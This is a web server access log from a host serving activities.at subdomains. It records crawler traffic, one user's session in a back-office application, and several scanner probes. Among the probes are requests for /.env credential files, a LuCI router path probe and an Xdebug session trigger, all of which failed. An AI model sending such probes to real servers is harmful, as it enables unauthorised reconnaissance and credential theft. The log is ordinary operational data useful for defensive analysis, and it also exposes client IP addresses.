156.59.198.136 - - [18/Dec/2024:08:20:04 +0100] "GET /renault.activities.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Dec/2024:08:24:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912111803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [18/Dec/2024:08:25:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
45.156.129.52 - - [18/Dec/2024:08:25:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.52 - - [18/Dec/2024:08:25:34 +0100] "GET /css/images/PTZOptics_powerby.png HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.136 - - [18/Dec/2024:08:28:04 +0100] "GET /ed.activities.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [18/Dec/2024:08:29:41 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
156.59.198.136 - - [18/Dec/2024:08:32:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002171603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [18/Dec/2024:08:33:28 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
52.230.152.155 - - [18/Dec/2024:08:36:00 +0100] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
95.214.53.91 - - [18/Dec/2024:08:37:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.156.21.66 - - [18/Dec/2024:08:37:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [18/Dec/2024:08:40:36 +0100] "GET /renault.activities.at/htdocs/binaries/10044339.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [18/Dec/2024:08:41:15 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
216.218.206.68 - - [18/Dec/2024:08:42:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
35.203.210.217 - - [18/Dec/2024:08:49:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
199.127.63.64 - - [18/Dec/2024:08:51:11 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [18/Dec/2024:08:54:03 +0100] "GET /docs/ecommlogistics/belege/GS16-000001.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [18/Dec/2024:09:07:33 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
156.59.198.135 - - [18/Dec/2024:09:08:52 +0100] "GET /ed.activities.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [18/Dec/2024:09:09:30 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:30 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:30 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:30 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:30 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509370 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509370 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509370 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509370 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2410 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509371 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:31 +0100] "GET /gui/javascript/form_form.js?1734509371 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:32 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:32 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:32 +0100] "GET /gui/javascript/form_form.js?1734509372 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:32 +0100] "GET /gui/javascript/form_form.js?1734509372 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:09:38 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1967 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:41 +0100] "GET /gui/javascript/form_form.js?1734509441 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:41 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2011 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:41 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /gui/javascript/form_form.js?1734509442 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /gui/javascript/form_form.js?1734509442 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /gui/images/icons/menumanagement.gif HTTP/1.1" 200 204 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:10:42 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:11:42 +0100] "GET /entry.php?id=10271&&ser=509442 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:11:42 +0100] "GET /gui/javascript/form_form.js?1734509502 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509442" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:12:42 +0100] "GET /entry.php?id=10271&&ser=509502 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509442" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:12:42 +0100] "GET /gui/javascript/form_form.js?1734509562 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509502" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [18/Dec/2024:09:12:52 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103121503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [18/Dec/2024:09:13:43 +0100] "GET /entry.php?id=10271&&ser=509562 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509502" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:13:43 +0100] "GET /gui/javascript/form_form.js?1734509623 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
143.110.182.33 - - [18/Dec/2024:09:14:22 +0100] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
178.165.191.42 - - [18/Dec/2024:09:14:43 +0100] "GET /entry.php?id=10271&&ser=509623 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:14:43 +0100] "GET /gui/javascript/form_form.js?1734509683 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509623" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
143.110.182.33 - - [18/Dec/2024:09:14:54 +0100] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
143.110.182.33 - - [18/Dec/2024:09:15:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
178.165.191.42 - - [18/Dec/2024:09:15:44 +0100] "GET /entry.php?id=10271&&ser=509683 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=509623" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:15:44 +0100] "GET /gui/javascript/form_form.js?1734509744 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509683" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:16:44 +0100] "GET /entry.php?id=10271&&ser=509744 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509683" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:16:44 +0100] "GET /gui/javascript/form_form.js?1734509804 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509744" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:44 +0100] "GET /entry.php?id=10271&&ser=509804 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509744" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:44 +0100] "GET /gui/javascript/form_form.js?1734509864 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509804" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10712 HTTP/1.1" 200 402 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10676&&title=Artikelverwaltung HTTP/1.1" 200 1393 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /gui/javascript/form_form.js?1734509870 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Artikelverwaltung" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10715& HTTP/1.1" 200 2532 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10716& HTTP/1.1" 200 4886 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 2691 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2179 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:50 +0100] "GET /entry.php?id=10714&checksegmentation=false& HTTP/1.1" 200 4152 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:51 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:51 +0100] "GET /gui/javascript/form_form.js?1734509871 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:17:51 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:45 +0100] "GET /entry.php?id=10271&&ser=509864 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509804" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:45 +0100] "GET /gui/javascript/form_form.js?1734509925 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509864" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:46 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2608 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:46 +0100] "GET /gui/javascript/form_form.js?1734509926 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:46 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2311 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:47 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3026 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:55 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7778 "http://hausegger.activities.at/entry.php?id=10716&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:55 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:55 +0100] "GET /gui/javascript/form_form.js?1734509935 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:55 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:18:59 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:19:45 +0100] "GET /entry.php?id=10271&&ser=509925 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=509864" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:19:45 +0100] "GET /gui/javascript/form_form.js?1734509985 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509925" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:20:45 +0100] "GET /entry.php?id=10271&&ser=509985 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=509925" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:20:45 +0100] "GET /gui/javascript/form_form.js?1734510045 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=509985" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:21:47 +0100] "GET /entry.php?id=10271&&ser=510045 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=509985" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:21:47 +0100] "GET /gui/javascript/form_form.js?1734510107 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510045" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:22:47 +0100] "GET /entry.php?id=10271&&ser=510107 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=510045" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:22:47 +0100] "GET /gui/javascript/form_form.js?1734510167 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510107" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:23:47 +0100] "GET /entry.php?id=10271&&ser=510167 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=510107" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:23:48 +0100] "GET /gui/javascript/form_form.js?1734510228 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:24:48 +0100] "GET /entry.php?id=10271&&ser=510228 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=510167" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:24:48 +0100] "GET /gui/javascript/form_form.js?1734510288 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:25:48 +0100] "GET /entry.php?id=10271&&ser=510288 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=510228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:25:48 +0100] "GET /gui/javascript/form_form.js?1734510348 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:26:48 +0100] "GET /entry.php?id=10271&&ser=510348 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=510288" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:26:48 +0100] "GET /gui/javascript/form_form.js?1734510408 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510348" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:27:49 +0100] "GET /entry.php?id=10271&&ser=510408 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=510348" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [18/Dec/2024:09:27:49 +0100] "GET /gui/javascript/form_form.js?1734510469 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=510408" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
